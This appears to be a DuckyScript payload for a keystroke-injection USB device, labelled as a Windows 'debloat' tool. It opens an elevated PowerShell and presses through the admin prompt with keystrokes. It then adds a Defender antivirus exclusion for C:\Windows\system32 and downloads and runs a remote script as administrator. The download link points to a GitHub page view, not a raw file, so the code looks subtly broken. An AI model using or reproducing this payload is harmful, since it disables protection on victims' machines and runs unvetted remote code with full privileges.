19 lines
549 B
Plaintext
19 lines
549 B
Plaintext
REM Author: UNC0V3R3D
|
|
REM Description: Debloat windows.
|
|
REM Version: 1.0
|
|
REM Category: GoodUSB
|
|
DELAY 500
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell Start-Process powershell -Verb runAs
|
|
CTRL-SHIFT ENTER
|
|
DELAY 1500
|
|
SHIFT TAB
|
|
DELAY 500
|
|
ENTER
|
|
DELAY 1500
|
|
STRING Add-MpPreference -ExclusionPath C:\Windows\system32
|
|
ENTER
|
|
DELAY 500
|
|
STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/debloat_windows.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
|
|
ENTER |